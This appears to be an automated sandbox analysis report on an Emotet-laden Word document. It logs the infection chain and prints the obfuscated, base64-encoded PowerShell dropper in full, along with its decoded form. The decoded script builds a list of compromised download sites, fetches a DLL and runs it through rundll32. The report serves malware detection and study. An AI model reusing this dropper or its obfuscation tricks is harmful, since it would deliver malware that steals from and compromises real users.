                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfhmd\pcib.aey',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbC:\W source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb!! source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: ws\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dllem.pdb5\ source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2100799855.0000000002AF0000.00000002.00000001.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: m.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: MAIL-0573188.doc | Initial sample: OLE summary subject = Argentina Pass Adaptive transitional override payment haptic Handcrafted Cotton Towels

                      Data Obfuscation:

                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
                      Source: MAIL-0573188.doc | Stream path 'Macros/VBA/Owppnp8hah4xo788' : High number of GOTO operations
                      Source: VBA code instrumentation | OLE, VBA macro, High number of GOTO operations: Module Owppnp8hah4xo788
                      Obfuscated command line found
                      Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
                      PowerShell case anomaly found
                      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Suspicious powershell command line found
                      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10008085 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10004ADA push ecx; ret

                      Persistence and Installation Behavior:

                      Creates processes via WMI
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Shuwftk\rwhokf.exo:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Gfhmd\pcib.aey:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji:Zone.Identifier read attributes | delete
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1692Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F109C FindFirstFileW,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: powershell.exe, 00000005.00000002.2098871684.00000000002B4000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0032C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001FC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002EC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001FC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001B30 SetLastError,SetLastError,VirtualAlloc,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007F07 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 5.2.136.90 80
                      Encrypted powershell cmdline option found
                      Source: unknownProcess created: Base64 decoded sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s')) ; $Wi8 =[tyPe]("{2}{3}{7}{1}{4}{6}{5}{8}{0}"-F 'gER','.Net.SERV','SYs','Te','I','tmA','CePOIN','m','Na') ; $ErrorActionPreference = (('Silent'+'ly')+'C'+('on'+'ti')+'n'+'ue');$Ol9onki=$C02W + [char](64) + $A03P;$H27X=('I'+('6'+'7Q')); (gi ("VaR"+"iABLe:k"+"47d") ).vaLue::"CrE`A`T`EDIReCT`ORy"($HOME + (('{'+'0'+'}Ns'+'p'+'zvsg{'+'0}'+'Sj_dwgs{'+'0}') -f [CHAR]92));$T48K=('H'+('61'+'D')); $Wi8::"secuRit`yprO`T`ocoL" = (('Tl'+'s')+'12');$C59M=(('M'+'24')+'P');$Xmmhked = (('R'+'31')+'N');$A69I=(('P_'+'6')+'B');$Q2yg9g_=$HOME+((('1'+'wr')+('Ns'+'pz')+('v'+'sg')+'1w'+('rS'+'j_'+'dw'+'gs1wr'))."rEp`lAce"(([Char]49+[Char]119+[Char]114),'\'))+$Xmmhked+(('.d'+'l')+'l');$U39R=('M0'+'1P');$Qcech4h=(']a'+('n'+'w[3://')+('w'+'ps')+'a'+'pk'+('.co'+'m/wp-'+'ad'+'mi')+('n/v'+'/@')+']'+('anw'+'[3'+'://s')+('ofsu'+'i')+'te'+('.c'+'o')+'m/'+'wp'+('-i'+'nc')+('lud'+'e')+'s/'+('2jm3n'+'Ik/'+'@')+(']a'+'nw[')+'3'+('://veter'+'inaria'+'d')+('rp'+'op')+('ui.co'+'m')+('/'+'co')+'n'+'te'+('nt'+'/5f')+'1'+'8Q'+'/'+'@'+(']a'+'n')+'w'+('[3:'+'//sh'+'op'+'.')+'el'+'e'+('men'+'sl'+'i')+('d'+'e.')+('com'+'/')+'wp'+'-c'+'o'+('n'+'tent')+('/'+'n/'+'@]an')+('w[3'+'://')+'k'+('h'+'an')+('h'+'ho')+('aho'+'m')+('nay.ne'+'t/'+'wordp')+('re'+'s')+('s/'+'C')+('GMC/@'+']')+'an'+'w'+('[3:/'+'/')+('ca'+'m')+('pu'+'se'+'xpo'+'.org/de')+'p'+('ar'+'tmen')+'t'+('-'+'of-odhm')+('mkd/95eX'+'Z'+'Y')+('/@]anw['+'3s://g'+'ur'+'zta'+'c
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s')) ; $Wi8 =[tyPe]("{2}{3}{7}{1}{4}{6}{5}{8}{0}"-F 'gER','.Net.SERV','SYs','Te','I','tmA','CePOIN','m','Na') ; $ErrorActionPreference = (('Silent'+'ly')+'C'+('on'+'ti')+'n'+'ue');$Ol9onki=$C02W + [char](64) + $A03P;$H27X=('I'+('6'+'7Q')); (gi ("VaR"+"iABLe:k"+"47d") ).vaLue::"CrE`A`T`EDIReCT`ORy"($HOME + (('{'+'0'+'}Ns'+'p'+'zvsg{'+'0}'+'Sj_dwgs{'+'0}') -f [CHAR]92));$T48K=('H'+('61'+'D')); $Wi8::"secuRit`yprO`T`ocoL" = (('Tl'+'s')+'12');$C59M=(('M'+'24')+'P');$Xmmhked = (('R'+'31')+'N');$A69I=(('P_'+'6')+'B');$Q2yg9g_=$HOME+((('1'+'wr')+('Ns'+'pz')+('v'+'sg')+'1w'+('rS'+'j_'+'dw'+'gs1wr'))."rEp`lAce"(([Char]49+[Char]119+[Char]114),'\'))+$Xmmhked+(('.d'+'l')+'l');$U39R=('M0'+'1P');$Qcech4h=(']a'+('n'+'w[3://')+('w'+'ps')+'a'+'pk'+('.co'+'m/wp-'+'ad'+'mi')+('n/v'+'/@')+']'+('anw'+'[3'+'://s')+('ofsu'+'i')+'te'+('.c'+'o')+'m/'+'wp'+('-i'+'nc')+('lud'+'e')+'s/'+('2jm3n'+'Ik/'+'@')+(']a'+'nw[')+'3'+('://veter'+'inaria'+'d')+('rp'+'op')+('ui.co'+'m')+('/'+'co')+'n'+'te'+('nt'+'/5f')+'1'+'8Q'+'/'+'@'+(']a'+'n')+'w'+('[3:'+'//sh'+'op'+'.')+'el'+'e'+('men'+'sl'+'i')+('d'+'e.')+('com'+'/')+'wp'+'-c'+'o'+('n'+'tent')+('/'+'n/'+'@]an')+('w[3'+'://')+'k'+('h'+'an')+('h'+'ho')+('aho'+'m')+('nay.ne'+'t/'+'wordp')+('re'+'s')+('s/'+'C')+('GMC/@'+']')+'an'+'w'+('[3:/'+'/')+('ca'+'m')+('pu'+'se'+'xpo'+'.org/de')+'p'+('ar'+'tmen')+'t'+('-'+'of-odhm')+('mkd/95eX'+'Z'+'Y')+('/@]anw['+'3s://g'+'ur'+'zta'+'c
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD [base64-encoded command omitted]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Shuwftk\rwhokf.exo',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfhmd\pcib.aey',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD [base64-encoded command omitted]
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD [base64-encoded command omitted]
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD [base64-encoded command omitted]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004C5A cpuid
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007D46 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected Emotet
                      Source: Yara matchFile source: 0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2100881704.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2109299524.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2105243347.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2102822583.0000000000300000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2109419000.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2108184568.00000000002E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2107810345.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2339841860.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2103779024.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2103864264.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.2e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.320000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
